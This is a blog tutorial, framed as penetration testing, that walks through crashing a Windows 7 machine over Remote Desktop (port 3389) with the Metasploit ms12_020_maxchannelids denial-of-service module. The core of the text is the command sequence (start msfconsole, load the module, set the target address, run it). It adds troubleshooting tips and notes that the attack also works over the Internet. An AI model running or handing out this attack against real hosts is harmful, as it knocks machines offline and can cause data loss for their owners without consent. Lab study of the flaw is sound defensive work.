Penetration Testing Windows 7 by Crashing the Machine using Remote Desktop Connection Vulnerabilty .
This is a tutorial for Penetration Testing the windows 7 machine for the remote desktop connection Vulnerability using everyone’s favourite exploitation Framework , Metasploit . Earliar there were exploits for the unpatched XP Machines but in modern Operating Systems such as Windows 7 , there arent any such magical exploits . Generally penetration testing tutorials show the penetration testing on Windows XP Machine , but that is long gone OS , Hackingloops brings you a Penetration Testing Tutorial on Windows 7 Machine .
Generally we have seen Client side Exploits and payloads all the time for Windows 7 , Social Engineering Toolkit is great for such attacks . However Windows 7 still has a Vulnerabilty living in it , in the RDP (Remote Desktop Protocol) Port 3389 which is accessible over the LAN and the Internet . Over the Internet this is a little complicated due to the need of port forwarding , over the LAN this attack is as easy as a piece of cake .
All you need to do this penetration testing Tutorial is a Kali machine and a Victim Windows 7 Machine .
Penetration testing Windows 7 with Kali Linux
Lets begin the tutorial for a scenario where the Victim Windows 7 Machine is over LAN . All we need to get started is Windows 7 machines IP Address which you can easily get either by NMAP or IPCONFIG command (just in case you are practicing and you have the access to windows 7 Machine)
Start MeTaSploit : msfconsole
Next we need to select the exploit that we are planing to use i.e ms12_020_maxchannelids
Command : use auxillary/dos/windows/rdp/ms12_020_maxchannelids
Now if you dont know what options this exploit needs then type the command ” show options ” in msfconsole . This will present you with all the options this exploit needs to be set .
Set the Remote Host Ip Address :
Command : set RHOST <Vict-windows 7 IP>
And you are done !! .
Just type “exploit”
The Target machine will get a Blue screen and the machine will crash if all went right . And the Machine will REBOOT . This can be done over the Internet too !!! .
If you get an error of this sort, then most probably your Windows 7 machine has firewall enabled, and is blocking your packets. An antivirus could do the same thing. There might be some issues with the LAN connection too. A good diagnosis test would be to ping the machine. Also another problem that could be is that the Attacker Kali machine and the Victim Windows 7 Machine are not communicating which can be checked by Pinging . Make sure that remote Desktop is enabled on the Windows 7 Machine.
To enable Remote Desktop : Go to System (Control Panel\System and Security\System). Click on Remote settings. Select the “Allow Remote Connections to this computer” button and Click ok.